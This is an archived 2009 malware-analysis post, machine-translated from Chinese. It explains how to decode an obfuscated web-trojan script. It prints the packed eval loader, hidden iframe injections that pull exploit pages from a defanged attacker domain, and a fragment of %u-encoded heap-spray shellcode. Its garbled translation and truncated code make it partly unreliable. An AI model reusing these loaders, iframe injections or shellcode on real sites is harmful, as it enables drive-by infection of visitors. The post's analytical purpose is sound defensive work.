Examples teach you to understand the net horse-vulnerability warning-the black bar safety net

2009-08-06T00:00:00
ID MYHACK58:62200924190
Type myhack58
Reporter 佚名
Modified 2009-08-06T00:00:00

Description

The main code is as follows:

<SCRIPT language=”JavaScript”> window. status=”completed”; eval(function(p,a,c,k,e,d){e=function(c){return c. toString(3 6)};if(!”. replace(/^/,String)){while(c–){d[c. toString(a)]=k[c]||c. toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p. replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(’w(”\\a\\l\\9\\n\\3\\0\\e\\2\\g\\c\\4\\1\\2\\0\\ k\\e\\m\\h\\j\\1\\d \\4\\b\\3\\0\\8\\p\\4\\9\\7\\9\\1\\x\\g\\6\\2\\3\\8\\c\\1\\a\\2\\6\\7\\ i\\5\\5\\8\\6\\0\\1\\r\\6\\2\\7===code skip=====code skip=====code skip====code skip======code skip======\\e\\2\\g\\c\\4\\1\\2\\0\\ k\\e\\m\\h\\j\\1\\d \\4\\b\\3\\0\\8\\p\\4\\9\\7\\9\\b\\k\\k\\g\\6\\2\\3\\8\\c\\1\\a\\2\\6\\ 7\\i\\5\\5\\8\\6\\0\\1\\r\\6\\2\\7\\i\\5\\5\\f\\j\\q\\t\\1\\d\\4\\b\\3\\0\\f\\h\\s\\o”)’,3 5,3 5 ,'145/151/164/155/162/60/150/75/40/143/144/141/167/146/156/76/56/42/61/74/154/157/50/165/73/163/134/147/51/57/15/12|eval|6 7|1 7 0'. split(’|'),0,{})) </SCRIPT>

See the code is this form of

Or the old method put at the beginning of red eval replacement for the alert and then put the entire code is saved to a local text document. 并改名为.htm run

Then it will pop out of the results can be seen is a secondary encrypted

In the pop-up box ctrl+c to put the code to copy it to save to a text document and in the code before and after adding the start tag and the end tag <script language =javascript> </script>

Then again named. htm run then you can give out the address.

document. writeln(”<iframe src=ci7.htm width=1 0 0 height=1 0 0><\/iframe>”);

document. writeln(”<iframe src=fx.htm width=1 0 0 height=1 0 0><\/iframe>”);

document. writeln(”<iframe src=newcmd.htm width=1 0 0 height=1 0 0><\/iframe>”);

document. writeln(”<iframe src=rcmd.htm width=1 0 0 height=1 0 0><\/iframe>”);

document. writeln(”<iframe src=call.htm width=1 0 0 height=1 0 0><\/iframe>”);

Combined with the previous URL, that is

hXXp://i843y.cn/box/b02/ci7.htm hXXp://i843y.cn/box/b02/fx.htm hXXp://i843y.cn/box/b02/newcmd.htm hXXp://i843y.cn/box/b02/rcmd.htm hXXp://i843y.cn/box/b02/call.htm

To ci7. htm, for example

会 跳 转 到 hXXp://i843y.cn/box/b02/i7.htm

This page in the middle there is a large section of the eval at the beginning of the eval(”\1 6 3\1 6 0\1 6 2\1 4 1\1 7 1\5 0\4 2\4 5\1 6 5\6 5\4 2\5 3\4 2\6 6\4 2\5 3\4 2\1 4 5\7 0\4 2\5 3\4 2\4 5\1 6 5\6 0\4 2\5 3\4 2\6 0\6 0\6 0\4 5\1 6 5\6 5\6 3\4 2\5 3\4 2\6 0\6 0\4 5\1 6 5\4 2\5 3\4 2

This encryption mode in the freshow directly selecting the esc modes decoding point decode directly after it is solved to the box below. But out of the still encrypted

But this encryption method eval("spray("%u5"+"6"+"e8"+"%u0"+"0 0 0%u53"+"0 0% u"+"5 6"+"5 5%u8b"+"5 7%u246c%u8b"+"1 8%u3c45%u548b%u7"+"8 0 5%uea01%u4a8b%u8b"+"1 8%u20"+"5a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1

Directly put the eval back that a large segment of get the shellcode decoder will be able to understand out.